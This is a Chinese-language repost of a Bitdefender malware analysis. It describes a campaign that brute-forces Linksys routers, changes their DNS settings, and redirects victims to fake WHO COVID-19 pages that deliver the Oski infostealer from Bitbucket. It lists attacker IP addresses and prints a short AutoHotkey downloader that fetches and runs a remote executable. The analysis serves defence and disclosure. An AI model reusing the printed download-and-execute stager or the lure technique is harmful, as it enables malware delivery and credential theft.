Bitdefender发布《新的路由器DNS劫持攻击滥用Bitbucket来托管Infostealer》分析报告

Bitdefender研究人员最近发现了一种针对家用路由器的新攻击,并更改了DNS设置以将受害者重定向到提供Oski infostealer作为最终负载的恶意软件服务网站。 攻击的有趣之处在于,它使用流行的基于Web的版本控制存储库托管服务Bitbucket存储了恶意负载。为了确保受害者不会怀疑犯规行为,攻击者还滥用TinyURL(一种流行的缩短URL的Web服务)来隐藏指向Bitbucket有效负载的链接。 确实,用户重定向到的网页上提到了冠状病毒大流行,并承诺提供下载一个应用程序,该应用程序将给出“有关冠状病毒(COVID-19)的最新信息和说明”。 COVID-19是一个反复出现的主题,网络犯罪分子一直在滥用诱捕受害者的能力。与2月份相比,3月份涉及冠状病毒主题恶意软件的恶意报告增加了五倍,攻击者使用了利用冠状病毒错误信息的网络钓鱼骗局,担心医疗供应短缺

主要发现:

  • 主要针对Linksys路由器,强行使用远程管理凭据
  • 劫持路由器并更改其DNS IP地址
  • 将特定的网页/域列表重定向到以冠状病毒为主题的恶意网页
  • 使用Bitbucket存储恶意软件样本
  • 使用TinyURL隐藏Bitbucket链接
  • 丢弃Oski Inforstealer恶意软件

攻击如何进行

对于黑客来说,背负流行病之类的全球新闻以发送带有受污染附件的网络钓鱼电子邮件并不少见,但最近的进展证明,即使这些邮件没有创造性地折衷受害者。 攻击者似乎一直在寻找易受攻击的路由器的互联网,试图通过暴力破解密码来破坏它们,并更改其DNS IP设置。 DNS设置非常重要,因为它们就像电话簿一样工作。每当用户键入网站名称时,DNS服务都可以将其发送到提供该特定域名的相应IP地址。简而言之,DNS的工作原理几乎与智能手机的日程安排相同:每当您要呼叫某人时,您只需查找其姓名,而不必记住他们的电话号码。 一旦攻击者更改了DNS IP地址,他们就可以解决任何请求并将用户重定向到攻击者控制的网页,而无需任何人明智。 DNS IP地址如下:
  • 109.234.35.230
  • 94.103.82.249
以下是一些重定向的目标域的列表:
  • “ aws.amazon.com”
  • “ goo.gl”
  • “ bit.ly”
  • “ washington.edu”
  • “ imageshack.us”
  • “ ufl.edu”
  • “ disney.com”
  • “ cox.net”
  • “ xhamster.com”
  • “ pubads.g.doubleclick.net”
  • “ tidd.ly”
  • “ redditblog.com”
  • “ fiddler2.com”
  • “ winimage.com”
当尝试访问上述域之一时,实际上会将用户重定向到IP地址176.113.81.159、193.178.169.148、95.216.164.181,该消息显示来自世界卫生组织的消息,告诉用户下载和安装应用程序提供有关COVID-19的说明和信息。 有趣的是,通过更改路由器上的DNS设置,用户实际上会认为他们已经登陆了合法的网页,只是该网页是通过其他IP地址提供的。例如,当用户键入“ example.com”时,该网页不是由合法IP地址提供,而是由由恶意DNS设置解决的由攻击者控制的IP提供。如果由攻击者控制的网页是即时传真,则用户实际上会认为,从浏览器地址栏中的域名来看,他们已经登陆了合法网页。 如下面的屏幕截图所示,每当受害者想要访问上面列出的目标域之一时,攻击者只会简单地显示一条消息,就像合法域提示一样。由于浏览器地址栏中显示的域名没有变化,因此受害者没有理由相信查看的消息是由攻击者控制的IP地址提供的。
下载按钮的“ href”标签(超链接)设置为https://google.com/chrome,因此当受害者将鼠标悬停在按钮上时,它看起来很干净。但是实际上设置了“单击”事件,该事件将URL更改为恶意事件,并隐藏在用TinyURL缩短的URL中。
用户点击“下载”后,实际上实际上是从Bitbucket存储库中下载了恶意的.exe文件,完全没有察觉。
为了使该文件看起来合法(就像文件名表明其合法性一样),攻击者将其命名为“ runset.EXE”,“ covid19informer.exe”或“ setup_who.exe”。 从攻击的流程来看,似乎初始有效负载实际上是一个下载程序,为此我们看到了两种变体:
  • 一个cab文件,其中嵌入了一个.net文件,该文件使用TinyUrl服务从bitbucket存储库中下载了最终的有效负载
  • 一个自动热键脚本,它将直接从bitbucket存储库中下载最终的有效负载。
; <COMPULTER: v1.1.22.07> 
 #NoTrayIcon
 UrlDownloadToFile, https[:]//tiny.cc/w81hlz, %A_AppData%\pre_set.exe 
 Loop 
    { 
       IfExist, %A_AppData%\pre_set.exe 
            { 
                RunWait, %A_AppData%\pre_set.exe ooplod 
                Sleep, 1000 
                ExitApp 
            } 
在攻击的最后阶段,下载了带有MPRESS的恶意文件。此有效载荷是Oski窃取程序,可与C&C服务器进行通信以上传被盗的信息。 Oski是一个相对较新的信息窃取者,似乎已经在2019年末出现。它包含的一些功能围绕提取浏览器凭据和加密货币钱包密码,其创建者甚至吹嘘说它可以提取存储在各种Web浏览器的SQL数据库中的凭据。和Windows注册表。 在第一阶段,我们还观察到.net文件具有一个URL(hxxps:// iplogger [。] org / 1l8Gp),该URL指向攻击者可以用来跟踪受感染IP地址和数量的统计信息页面。受感染的受害者。

受害人

根据从我们发现仍在增加的两个Bitbucket存储库中的累计下载量来看,过去几天中,当前潜在的受害者数量估计约为1,193。 在调查过程中,Bitdefender研究人员发现了4个Bitbucket存储库。这意味着受害者的数量可能会更高,因为Bitbucket已经删除了其他两个存储库,这使我们无法完全了解受害者的数量。 另一个证明这是相对较新的攻击的命中是Bitdefender的遥测,表明它全部始于3月18日,并于3月23日达到活动高峰(图1)。 我们估计受害者的数量在未来几周内可能会增加,尤其是如果攻击者建立了其他存储库(无论是托管在Bitbucket还是其他代码存储库托管服务上),因为冠状病毒大流行仍然是“热门话题”。
尽管攻击者可能会在互联网上寻找路由器容易受到攻击的受害者,但Bitdefender自己的遥测表明,德国,法国和美国的受害者占总数的73%以上。这些国家还是受冠状病毒爆发影响最大的国家之一,这可能解释了为什么攻击者使用主题网站。
尚不清楚路由器是如何受到危害的,但是基于可用的遥测技术,攻击者似乎通过直接访问在线暴露的路由器管理控制台或通过强行使用Linksy云帐户来暴力破解某些Linksys路由器模型。 这些Linksys路由器功能使用户可以使用可从家庭网络外部访问的Linksys云帐户,从浏览器或移动设备远程拨入其家庭网络。由于大多数目标路由器似乎都与该特定制造商有关,因此这也是攻击者利用的攻击媒介是有道理的。

注意安全!

建议除了更改路由器的控制面板访问凭据(最好不是默认的访问凭据)外,用户还应更改其Linksys云帐户凭据或路由器的任何远程管理帐户,以避免通过暴力或凭据填充进行接管攻击。 当然,我们也强烈建议确保路由器的固件始终是最新的,因为它可以防止攻击者利用未修补的漏洞来接管设备。 最后但同样重要的是,请确保所有设备都安装了安全解决方案,以防止您访问网络钓鱼或欺诈性网站以及下载和安装恶意软件。

妥协指标

危害指标包括下载程序,最后阶段的有效负载,存储库的URL以及最后阶段的有效负载的C&C。
注意:本文基于由Bitdefender Labs团队提供的技术信息。
0 0 vote
Article Rating

未经允许不得转载:x-sec » Bitdefender发布《新的路由器DNS劫持攻击滥用Bitbucket来托管Infostealer》分析报告

赞 (0) 打赏
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

0
Would love your thoughts, please comment.x
()
x